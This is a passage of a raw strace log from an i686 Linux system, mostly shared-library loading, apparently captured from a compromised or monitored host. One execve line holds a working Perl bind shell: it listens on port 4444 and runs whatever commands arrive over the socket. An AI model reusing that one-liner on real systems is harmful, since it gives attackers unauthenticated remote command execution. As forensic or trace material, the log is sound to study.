\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
11117 20:13:29.748150 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
11117 20:13:29.748206 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7de3000
11117 20:13:29.748219 mmap2(0xb7dea000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7dea000
11117 20:13:29.748256 close(1)          = 0
11117 20:13:29.748269 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.748282 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
11117 20:13:29.748296 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
11117 20:13:29.748473 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
11117 20:13:29.748495 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcb000
11117 20:13:29.748507 mmap2(0xb7ddf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ddf000
11117 20:13:29.748525 mmap2(0xb7de1000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7de1000
11117 20:13:29.748540 close(1)          = 0
11117 20:13:29.748567 munmap(0xb7f71000, 29913) = 0
11117 20:13:29.748585 open("/etc/ld.so.cache", O_RDONLY) = 1
11117 20:13:29.748597 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11117 20:13:29.748613 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f71000
11117 20:13:29.748623 close(1)          = 0
11117 20:13:29.748633 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.748648 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
11117 20:13:29.748662 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
11117 20:13:29.748764 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
11117 20:13:29.748781 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dc1000
11117 20:13:29.748793 mmap2(0xb7dc9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7dc9000
11117 20:13:29.748810 close(1)          = 0
11117 20:13:29.748832 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11117 20:13:29.748846 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
11117 20:13:29.748861 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
11117 20:13:29.748952 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
11117 20:13:29.748969 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db6000
11117 20:13:29.748981 mmap2(0xb7dbf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dbf000
11117 20:13:29.749004 close(1)          = 0
11117 20:13:29.749025 munmap(0xb7f71000, 29913) = 0
11117 20:13:29.749041 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
11117 20:13:29.749056 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
11117 20:13:29.749068 _llseek(1, 0, [0], SEEK_CUR) = 0
11117 20:13:29.749080 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
11117 20:13:29.749097 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f78000
11117 20:13:29.749108 _llseek(1, 1624, [1624], SEEK_SET) = 0
11117 20:13:29.749123 munmap(0xb7f78000, 1624) = 0
11117 20:13:29.749133 close(1)          = 0
11117 20:13:29.749162 getpgrp()         = 3831
11117 20:13:29.749173 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
11117 20:13:29.749189 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
11117 20:13:29.749205 brk(0x8101000)    = 0x8101000
11117 20:13:29.749237 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11117 20:13:29.749253 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11117 20:13:29.749268 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
11117 20:13:29.749305 brk(0x8102000)    = 0x8102000
11117 20:13:29.749424 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11117 20:13:29.749445 stat64("/sbin/AB", 0xbfe6ccc8) = -1 ENOENT (No such file or directory)
11117 20:13:29.749457 stat64("/bin/AB", 0xbfe6ccc8) = -1 ENOENT (No such file or directory)
11117 20:13:29.749469 stat64("/usr/sbin/AB", 0xbfe6ccc8) = -1 ENOENT (No such file or directory)
11117 20:13:29.749481 stat64("/usr/bin/AB", 0xbfe6ccc8) = -1 ENOENT (No such file or directory)
11117 20:13:29.749494 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
11117 20:13:29.749509 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dec6f8) = 11118
11118 20:13:29.749560 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11118 20:13:29.749577 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
11118 20:13:29.749590 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
11118 20:13:29.749602 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
11118 20:13:29.749618 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11118 20:13:29.749635 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11118 20:13:29.749648 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
11118 20:13:29.749705 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
11118 20:13:29.749720 --- SIGPIPE (Broken pipe) @ 0 (0) ---
11118 20:13:29.749790 exit_group(127)   = ?
11117 20:13:29.834154 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
4519  20:13:29.834196 waitpid(11117,  <unfinished ...>
11117 20:13:29.834222 <... rt_sigprocmask resumed> NULL, 8) = 0
11117 20:13:29.854492 --- SIGCHLD (Child exited) @ 0 (0) ---
11117 20:13:29.854623 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 11118
11117 20:13:29.854718 waitpid(-1, 0xbfe6c948, WNOHANG) = -1 ECHILD (No child processes)
11117 20:13:29.854762 sigreturn()       = ? (mask now [])
11117 20:13:29.854805 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
11117 20:13:29.854833 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11117 20:13:29.854853 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
11117 20:13:29.854866 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
11117 20:13:29.854885 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11117 20:13:29.854896 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
11117 20:13:29.854932 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
11117 20:13:29.854953 stat64("/sbin/perl", 0xbfe6ccf8) = -1 ENOENT (No such file or directory)
11117 20:13:29.854966 stat64("/bin/perl", 0xbfe6ccf8) = -1 ENOENT (No such file or directory)
11117 20:13:29.854977 stat64("/usr/sbin/perl", 0xbfe6ccf8) = -1 ENOENT (No such file or directory)
11117 20:13:29.854989 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
11117 20:13:29.855007 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
11117 20:13:29.855032 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
11117 20:13:29.855046 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dec6f8) = 11119
11119 20:13:30.144330 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
11119 20:13:30.144366 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
11119 20:13:30.144381 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
11119 20:13:30.144393 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
11119 20:13:30.144409 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
11119 20:13:30.144425 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
11119 20:13:30.144439 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
11119 20:13:30.144479 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
11119 20:13:30.144581 brk(0)            = 0x8153000
11119 20:13:30.144604 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11119 20:13:30.144621 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f26000
11119 20:13:30.144638 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
11119 20:13:30.144671 open("/etc/ld.so.cache", O_RDONLY) = 1
11119 20:13:30.144716 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
11119 20:13:30.144750 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f1e000
11119 20:13:30.144761 close(1)          = 0
11119 20:13:30.144772 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11119 20:13:30.144788 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1
11119 20:13:30.144803 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512
11119 20:13:30.144897 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0
11119 20:13:30.144915 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1a000
11119 20:13:30.144928 mmap2(0xb7f1c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f1c000
11119 20:13:30.144945 close(1)          = 0
11119 20:13:30.144957 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11119 20:13:30.144971 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1
11119 20:13:30.144986 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512
11119 20:13:30.145081 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0
11119 20:13:30.145099 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ef5000
11119 20:13:30.145111 mmap2(0xb7f18000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f18000
11119 20:13:30.145127 close(1)          = 0
11119 20:13:30.145139 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11119 20:13:30.145166 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1
11119 20:13:30.145211 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512
11119 20:13:30.145313 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0
11119 20:13:30.145330 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ef4000
11119 20:13:30.145344 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7edc000
11119 20:13:30.145355 mmap2(0xb7ef0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ef0000
11119 20:13:30.145369 mmap2(0xb7ef2000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ef2000
11119 20:13:30.145384 close(1)          = 0
11119 20:13:30.145396 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11119 20:13:30.145411 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1
11119 20:13:30.145426 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512
11119 20:13:30.145516 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0
11119 20:13:30.145537 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d8d000
11119 20:13:30.145549 mmap2(0xb7ed6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ed6000
11119 20:13:30.145564 mmap2(0xb7ed9000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ed9000
11119 20:13:30.145577 close(1)          = 0
11119 20:13:30.145590 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11119 20:13:30.145604 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1
11119 20:13:30.145618 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 